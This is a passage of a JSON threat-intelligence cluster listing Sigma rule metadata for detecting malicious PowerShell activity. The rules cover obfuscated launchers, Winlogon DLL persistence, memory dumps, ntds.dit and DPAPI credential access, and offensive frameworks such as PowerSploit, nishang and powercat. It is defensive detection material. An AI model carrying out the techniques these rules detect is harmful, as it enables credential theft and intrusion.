"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" }, { "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Unknown" ], "filename": "posh_ps_winlogon_helper_dll.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" ], "tags": [ "attack.persistence", "attack.t1547.004" ] }, "related": [ { "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", "value": "Winlogon Helper DLL" }, { "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Legitimate use of the library" ], "filename": "posh_ps_dotnet_assembly_from_file.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1620" ] }, "related": [ { "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "value": "Potential In-Memory Execution Using Reflection.Assembly" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_var.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" }, { "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_remove_adgroupmember.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", "value": "Remove Account From Domain Admin Group" }, { "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-09-21", "falsepositive": [ "Diagnostics" ], "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd185561-4760-45d6-a63e-a51325112cae", "value": "Live Memory Dump Using Powershell" }, { "description": "Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-26", "falsepositive": [ "Legitimate usage of DSInternals for administration or audit purpose." ], "filename": "posh_ps_dsinternals_cmdlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dsinternals_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "846c7a87-8e14-4569-9d49-ecfd4276a01c", "value": "DSInternals Suspicious PowerShell Cmdlets - ScriptBlock" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2019-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" }, { "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Administrator script" ], "filename": "posh_pm_susp_ad_group_reco.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" }, { "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-11", "falsepositive": [ "Programs using PowerShell directly without invocation of a dedicated interpreter", "MSP Detection Searcher", "Citrix ConfigSync.ps1" ], "filename": "posh_pm_alternate_powershell_hosts.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", "value": "Alternate PowerShell Hosts - PowerShell Module" }, { "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "posh_pm_active_directory_module_dll_import.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/ADModule", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml" ], "tags": [ "attack.reconnaissance", "attack.discovery", "attack.impact" ] }, "uuid": "74176142-4684-4d8a-8b0a-713257e7df8e", "value": "Potential Active Directory Enumeration Using AD Module - PsModule" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_clip.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" }, { "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Administrator script" ], "filename": "posh_pm_susp_smb_share_reco.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6942bd25-5970-40ab-af49-944247103358", "value": "Suspicious Get Information for SMB Share - PowerShell Module" }, { "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", "meta": { "author": "frack113", "creation_date": "2022-02-21", "falsepositive": [ "Administrator PowerShell scripts" ], "filename": "posh_pm_susp_reset_computermachinepassword.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3818659-5016-4811-a73c-dde4679169d2", "value": "Suspicious Computer Machine Password by PowerShell" }, { "description": "Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-25", "falsepositive": [ "Unknown" ], "filename": "posh_pm_hktl_evil_winrm_execution.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code", "https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_hktl_evil_winrm_execution.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "9fe55ea2-4cd6-4491-8a54-dd6871651b51", "value": "HackTool - Evil-WinRm Execution - PowerShell Module" }, { "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "posh_pm_susp_get_nettcpconnection.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "value": "Use Get-NetTCPConnection - PowerShell Module" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_compress.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" }, { "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "posh_pm_decompress_commands.yml", "level": "informational", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/8", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "value": "PowerShell Decompress Commands" }, { "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "meta": { "author": "frack113", "creation_date": "2021-12-12", "falsepositive": [ "Administrator script" ], "filename": "posh_pm_susp_local_group_reco.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "value": "Suspicious Get Local Groups Information" }, { "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-23", "falsepositive": [ "Unknown" ], "filename": "posh_pm_exploit_scripts.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu", "https://github.com/CsEnox/EventViewer-UACBypass", "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/nettitude/Invoke-PowerThIEf", "https://github.com/NetSPI/PowerUpSQL", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/besimorhino/powercat", "https://github.com/PowerShellMafia/PowerSploit", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41025fd7-0466-4650-a813-574aaacbe7f4", "value": "Malicious PowerShell Scripts - PoshModule" }, { "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-16", "falsepositive": [ "Unknown" ], "filename": "posh_pm_get_addbaccount.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", "value": "Suspicious Get-ADDBAccount Usage" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2019-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" }, { "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "posh_pm_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", "value": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module" }, { "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-20", "falsepositive": [ "Unknown" ], "filename": "posh_pm_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/adrecon/AzureADRecon", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/besimorhino/powercat", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://adsecurity.org/?p=2921", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/calebstewart/CVE-2021-1675", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1482", "attack.t1087", "attack.t1087.001", "attack.t1087.002", "attack.t1069.001", "attack.t1069.002", "attack.t1069", "attack.t1059.001" ] }, "related": [ { "dest-uuid": 